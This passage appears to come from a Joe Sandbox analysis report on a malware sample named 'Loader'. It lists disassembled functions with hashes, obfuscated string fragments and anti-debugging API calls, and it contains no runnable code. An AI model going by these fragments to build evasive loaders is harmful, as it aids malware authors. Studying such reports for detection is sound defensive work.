                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: '$($2$6$<$<$>$>$?$?$D$I$}$~
                                                                            • API String ID: 0-1549446310
                                                                            • Opcode ID: 367a348c16854c040ed8a8e1c50337844c82badbceb661a6883815d7b6a28ffd
                                                                            • Instruction ID: 5423c3c856f095a2f45c2705830182e25da5954703633015ab767e6198a73564
                                                                            • Opcode Fuzzy Hash: 367a348c16854c040ed8a8e1c50337844c82badbceb661a6883815d7b6a28ffd
                                                                            • Instruction Fuzzy Hash: 5BB1177395D7E18AE31189BD884524BEED21BD7228F1ECB6DD4E4873C6C569C8078393
                                                                            Function 6E50B6D5 Relevance: 16.0, Strings: 12, Instructions: 987COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                            • API String ID: 0-3385986306
                                                                            • Opcode ID: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
                                                                            • Instruction ID: 376b6ae54a1b0fcb11f4fcd454dd7519567de9a65f3b1b97ac1966fdd7e264f7
                                                                            • Opcode Fuzzy Hash: 463e9afdf012da67d84867e87a37cec8d83071b3943f87856e8a01a6767cd0ff
                                                                            • Instruction Fuzzy Hash: 3C82C27560D3828FD345CF68C49036ABBE1AB86704F18CA6DF4DA9B395D334D905CBA2
                                                                            Function 6E517B60 Relevance: 10.3, Strings: 8, Instructions: 302COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 9tWU$<194$ALC:$JHz~$UQGq$UW$^$^\V^
                                                                            • API String ID: 0-3233791986
                                                                            • Opcode ID: 1b76c00ea30690e806b229d34a8721d4fbe8444d2ee39c48be022f5bad116e41
                                                                            • Instruction ID: 94d41b4c84d66dd40feaf4bb1fbb37522f12e781b480a115aea537194f883b97
                                                                            • Opcode Fuzzy Hash: 1b76c00ea30690e806b229d34a8721d4fbe8444d2ee39c48be022f5bad116e41
                                                                            • Instruction Fuzzy Hash: 7A91AD7150D3918FD311CF69D4507AABFE0AF86704F08899CE4E99B392D735C90ACB96
                                                                            Function 6E517900 Relevance: 10.2, Strings: 8, Instructions: 218COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: &%9b$)vBW$*#1/$9&!:$s$>%$sp$.$x$x|."
                                                                            • API String ID: 0-2964809603
                                                                            • Opcode ID: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
                                                                            • Instruction ID: 3169dd4b7ecdc02e914d0baba360f0333f630348aa85bffdcbb04d5a44cbdbf0
                                                                            • Opcode Fuzzy Hash: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
                                                                            • Instruction Fuzzy Hash: E851B37410D3818BE345CF69D4A07ABBFE1EF93305F1499ACE4D14B291D37A890ACB62
                                                                            Function 6E50B400 Relevance: 10.2, Strings: 7, Instructions: 1454COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ $ $ $ $ $
                                                                            • API String ID: 0-935225467
                                                                            • Opcode ID: 7e3a9054b10ffa9b6b3e2b3cb611ff28d6c3ce50e1f1add8480a7a6e7f949604
                                                                            • Instruction ID: e652387e89e7cc3a5ef75aed893f4b1c343331e5b69ea239c122bd096cbc8b22
                                                                            • Opcode Fuzzy Hash: 7e3a9054b10ffa9b6b3e2b3cb611ff28d6c3ce50e1f1add8480a7a6e7f949604
                                                                            • Instruction Fuzzy Hash: 44A2F3716083428FD744CE68C4A037ABBE2AFD6314F188A6DF4A58B395E774D945CF82
                                                                            Function 6E5180B0 Relevance: 7.7, Strings: 6, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Lk$U\$Zb$\_$`$
                                                                            • API String ID: 0-227298061
                                                                            • Opcode ID: 80a7465b240ceaba27d8fd7acd63200aa4daaaec9e5f50990578a8dd437069c5
                                                                            • Instruction ID: 3fb97d79265db314ac7a20647249a2e73ac6cc79603b5f30bfec1397d3939419
                                                                            • Opcode Fuzzy Hash: 80a7465b240ceaba27d8fd7acd63200aa4daaaec9e5f50990578a8dd437069c5
                                                                            • Instruction Fuzzy Hash: FD81BCB124C3808FE310DF65D49079FBBE6EBC2314F14892DE1D58B291DB7985068B97
                                                                            Function 6E549020 Relevance: 7.0, Strings: 5, Instructions: 723COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$;:54$InA>$InA>$f
                                                                            • API String ID: 0-3857589079
                                                                            • Opcode ID: 736774bc0e92679049245a31f393efb7e22c33ca206622e3b3a5f049b5afa705
                                                                            • Instruction ID: a17cb8746d3da8d0d5d719d36fd24e5c811ed4eb589c46d7369d2ff3ddb744fb
                                                                            • Opcode Fuzzy Hash: 736774bc0e92679049245a31f393efb7e22c33ca206622e3b3a5f049b5afa705
                                                                            • Instruction Fuzzy Hash: EC32F472609342DFD304CF59C991B6BBBE6ABC9314F18CA2CE9A587394D774D805CB82
                                                                            Function 6E52E5E0 Relevance: 6.7, Strings: 5, Instructions: 461COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ){zy$)6$)B$|~$sq
                                                                            • API String ID: 0-2449703377
                                                                            • Opcode ID: ed205e49c4bd9890f08ba96f0ac492bda30eae2a3fd5dfea669e1982a0e0cea3
                                                                            • Instruction ID: aac39aa87705703aad15f697b4275a27cf35afb2dcb41dc343aeabb54ee4997d
                                                                            • Opcode Fuzzy Hash: ed205e49c4bd9890f08ba96f0ac492bda30eae2a3fd5dfea669e1982a0e0cea3
                                                                            • Instruction Fuzzy Hash: 69C1CEB15183118FD325CF29C89276BB7F1EF92354F148A2CE4D68B394EB399805CB92
                                                                            Function 6E5190C0 Relevance: 6.7, Strings: 5, Instructions: 426COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 52$\XTR$`a$f\nf$ngfa
                                                                            • API String ID: 0-1621357096
                                                                            • Opcode ID: 81ba660202492963c212c2fa93238453fc0233941f7c7c91ec69b3c465225053
                                                                            • Instruction ID: e8bacb187227d7857645447243b0ba002bc82f91b599ea285404308ae307e9d8
                                                                            • Opcode Fuzzy Hash: 81ba660202492963c212c2fa93238453fc0233941f7c7c91ec69b3c465225053
                                                                            • Instruction Fuzzy Hash: 81D1047560C3918BE344CE6984A13ABFBE1AFC1714F18C92DE4E59B281D779C906CB92
                                                                            Function 6E52AF06 Relevance: 6.7, Strings: 5, Instructions: 419COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: OI$RR$_W$us$}z{
                                                                            • API String ID: 0-1570830214
                                                                            • Opcode ID: 60bd2e07e64cdd6ec4ca63b18d80e27c1dbffe6ba89b33d60cedce7f0764e81a
                                                                            • Instruction ID: a28a73857e1db598291edc6a7909dc9cba7e020f745e2d1b4599736b2697d9bd
                                                                            • Opcode Fuzzy Hash: 60bd2e07e64cdd6ec4ca63b18d80e27c1dbffe6ba89b33d60cedce7f0764e81a
                                                                            • Instruction Fuzzy Hash: 21D134B2A117458FCB14CFA9C88029ABFF2FF85314F18CA6CD4946B385D7789946CB90
                                                                            Function 6E4F849A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6E4F84A6
                                                                            • IsDebuggerPresent.KERNEL32 ref: 6E4F8572
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4F858B
                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 6E4F8595
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                            • String ID:
                                                                            • API String ID: 254469556-0
                                                                            • Opcode ID: 517d8b3aa01929e6b993549fbee085f7fda8a1ac3e2eb292a11d6896df701288
                                                                            • Instruction ID: 29e8a2477c6bef7be4c78104310146406554d02c8ae80e3a8731aa5900ea04c6
                                                                            • Opcode Fuzzy Hash: 517d8b3aa01929e6b993549fbee085f7fda8a1ac3e2eb292a11d6896df701288
                                                                            • Instruction Fuzzy Hash: 6A31F7B5D05218DBDF10DFA5D989BCDBBB8AF48704F1041AAE40CAB240EB709B858F85
                                                                            Function 6E4FC45A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6E4FC552
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6E4FC55C
                                                                            • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6E4FC569
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 67a49a8d0c2c16bcc42631a3af3ea57c8555f3defbf407be01a1d75ad750fdc0
                                                                            • Instruction ID: 61765d12401b1214d6ee87232d1c2c9d18229716d5f438d3703dcfc715ad4791
                                                                            • Opcode Fuzzy Hash: 67a49a8d0c2c16bcc42631a3af3ea57c8555f3defbf407be01a1d75ad750fdc0
                                                                            • Instruction Fuzzy Hash: AD31E774901228DBCB21DF65D888BCDB7B8BF58710F5045DAE41CAB290EB309B828F44
                                                                            Function 6E52BF40 Relevance: 4.4, Strings: 3, Instructions: 657COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$;:54$s}
                                                                            • API String ID: 0-2837035532
                                                                            • Opcode ID: 8521f6ecfd962c45bded9db9fa15a38b11263f397f2fc75af69b06a5baf338c7
                                                                            • Instruction ID: 00627b47c442082400c2a518c43fca8db78cad890a39227f2e95f4d9ae1353d3
                                                                            • Opcode Fuzzy Hash: 8521f6ecfd962c45bded9db9fa15a38b11263f397f2fc75af69b06a5baf338c7
                                                                            • Instruction Fuzzy Hash: 7D22D0B16083419FE760DFA4C891B6BB7E6EBC6704F14883CE6C59B292D774D841CB92
                                                                            Function 6E512740 Relevance: 4.2, Strings: 3, Instructions: 420COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: )$)$IEND
                                                                            • API String ID: 0-588110143
                                                                            • Opcode ID: 5e990ce4fac7296d1d108adde10aa6021813bdf602cdc4fc0c2b25e57719d51f
                                                                            • Instruction ID: cd0e51fd1bc4efe69dd6858e430630e57ebd65a67d2138815a400800dbe7c8cf
                                                                            • Opcode Fuzzy Hash: 5e990ce4fac7296d1d108adde10aa6021813bdf602cdc4fc0c2b25e57719d51f
                                                                            • Instruction Fuzzy Hash: 6EF1E175A0C701AFE304CF68C89479ABBE4FB86308F044A2DEA9597381D774E914DBC2
                                                                            Function 6E54CC50 Relevance: 4.2, Strings: 3, Instructions: 419COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: InA>$P$3
                                                                            • API String ID: 0-4254740818
                                                                            • Opcode ID: 23bbe26acdc5d2f26a26c73dd2c929d2c44a0016ae28f2459096e5ca38903ed9
                                                                            • Instruction ID: 13aa4524906bb3255c4b01c16dc41aa30f5e6763b394d5904251e76a56ae7016
                                                                            • Opcode Fuzzy Hash: 23bbe26acdc5d2f26a26c73dd2c929d2c44a0016ae28f2459096e5ca38903ed9
                                                                            • Instruction Fuzzy Hash: 48E1F47260C3618FD325CF68889076FBBE1EBC5714F158A2CE9A59B395CB7488058BC2
                                                                            Function 6E4F7650 Relevance: 4.2, Strings: 3, Instructions: 410COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [N,)$5MS$g?j
                                                                            • API String ID: 0-4035854175
                                                                            • Opcode ID: ca6cf3db0e25f9dd645e5ca151be2a7f3fdca66875abafa992a817d8c7177a31
                                                                            • Instruction ID: e01d210fa11e7487da307f4377d7c9d6710f498da68174fcedefca7a5f9e917b
                                                                            • Opcode Fuzzy Hash: ca6cf3db0e25f9dd645e5ca151be2a7f3fdca66875abafa992a817d8c7177a31
                                                                            • Instruction Fuzzy Hash: 19E1A076E68145CFCB088EFDD598ADEB7F2AB8A700F008117E425E7398D6699807CF15
                                                                            Function 6E50B728 Relevance: 4.1, Strings: 3, Instructions: 389COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: -$gfff$gfff
                                                                            • API String ID: 0-837351935
                                                                            • Opcode ID: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
                                                                            • Instruction ID: 588dbf8a20046ff0c8db220c2568b6dc06b17837a1a8bae74c05c2b90d30c605
                                                                            • Opcode Fuzzy Hash: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
                                                                            • Instruction Fuzzy Hash: EDE19D7060C7928FC705CE69C49026AFBE1ABDA314F088A6EF9D987356D334D945CB92
                                                                            Function 6E5367E0 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Ea#c$Uqrs$cba
                                                                            • API String ID: 0-809142158
                                                                            • Opcode ID: d438f72da7592dac52202ef27c1eaeb2052d2bfd7c88c17bf9933536cd149b90
                                                                            • Instruction ID: b4a5de4532dbe4200815e438950df82b79085ff26f97240ede2f305be119ba74
                                                                            • Opcode Fuzzy Hash: d438f72da7592dac52202ef27c1eaeb2052d2bfd7c88c17bf9933536cd149b90
                                                                            • Instruction Fuzzy Hash: D271CE7251C3658FD320CF65884075FFBE4EBC5714F15892DE8E99B281D7B4860A8BD2
                                                                            Function 6E51AD0D Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: F]$V[$_]
                                                                            • API String ID: 0-3346205873
                                                                            • Opcode ID: e5a7414d0cadc82038771895add828698e3a1066b2b95cd0b490a0f0be21db8e
                                                                            • Instruction ID: ecb0f12f4c23170b7f0904ba5456e30845f8e4f6138510a8b40cc4983c9e5bb2
                                                                            • Opcode Fuzzy Hash: e5a7414d0cadc82038771895add828698e3a1066b2b95cd0b490a0f0be21db8e
                                                                            • Instruction Fuzzy Hash: 3C71CAB45087808FD3668F2AD594A62BFF1BF47310B1986CDC0E60F6A7C739940ACB85
                                                                            Function 6E51AD3E Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: F]$V[$_]
                                                                            • API String ID: 0-3346205873
                                                                            • Opcode ID: 0814b46b741e51f8672edf46a181fd31692ac0fbcc4119d23eae11493b5c9233
                                                                            • Instruction ID: f3d50788bb99e6cf775bd182e34168689ade7bba18a231a48ee806d37fdfb85b
                                                                            • Opcode Fuzzy Hash: 0814b46b741e51f8672edf46a181fd31692ac0fbcc4119d23eae11493b5c9233
                                                                            • Instruction Fuzzy Hash: 2271ACB41087808FD366CF2AD194A62BFE1AF56310B1986DCC0E60F767C735D80ACB95
                                                                            Function 6E518CD6 Relevance: 3.8, Strings: 3, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %!-0$:g;1$j
                                                                            • API String ID: 0-565037024
                                                                            • Opcode ID: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
                                                                            • Instruction ID: 14124af76ae048bac53faeeaa4baf39c49faafbcfd7a95fcfe11a1ee10375526
                                                                            • Opcode Fuzzy Hash: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
                                                                            • Instruction Fuzzy Hash: 4D11C17025D381CFD3518F6994206ABBBE0EBD3608F585E5CE0E26B251D371CD06CB46
                                                                            Function 6E518D96 Relevance: 3.8, Strings: 3, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %!-0$:g;1$j
                                                                            • API String ID: 0-565037024
                                                                            • Opcode ID: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
                                                                            • Instruction ID: 6eacb080b3071decfbe56e3559daee4ac1ae93aa676c3365255c485d92d871c9
                                                                            • Opcode Fuzzy Hash: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
                                                                            • Instruction Fuzzy Hash: 61F044A001D3408BD7418F29955185BFFE0FB96218F806E1CE0E56B281D3B0C60A8B8B
                                                                            Function 6E51B3EB Relevance: 2.8, Strings: 2, Instructions: 333COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: T1S7$xr
                                                                            • API String ID: 0-3241550807
                                                                            • Opcode ID: 57cbec6f575536e71c9facbf5599d3ebf445255db18584d56601f51637173bb4
                                                                            • Instruction ID: f095ee3c85f2ef21019022938032d812dfc8efcef6f2f987e5986ef682b2abbe
                                                                            • Opcode Fuzzy Hash: 57cbec6f575536e71c9facbf5599d3ebf445255db18584d56601f51637173bb4
                                                                            • Instruction Fuzzy Hash: 6DA1EEB52097808FE755CF69C4D0262BFE2BF56304B19859CC4D68F75AD336D80ACBA0
                                                                            Function 6E534AD0 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$SJK^
                                                                            • API String ID: 0-880411129
                                                                            • Opcode ID: 6b133a1bc997ef1be6f6f5d46954d0d4202491bfac8e762cacfab68672d74f2a
                                                                            • Instruction ID: 75b539838eec60f10042fe609a687484ba24a73e7fbbbab6de16dc621b0ce388
                                                                            • Opcode Fuzzy Hash: 6b133a1bc997ef1be6f6f5d46954d0d4202491bfac8e762cacfab68672d74f2a
                                                                            • Instruction Fuzzy Hash: 488147B6A083115BE750CEA5EC9077BB7D6EBC1704F29C83CDA818B245F775D8068342
                                                                            Function 6E5290DE Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
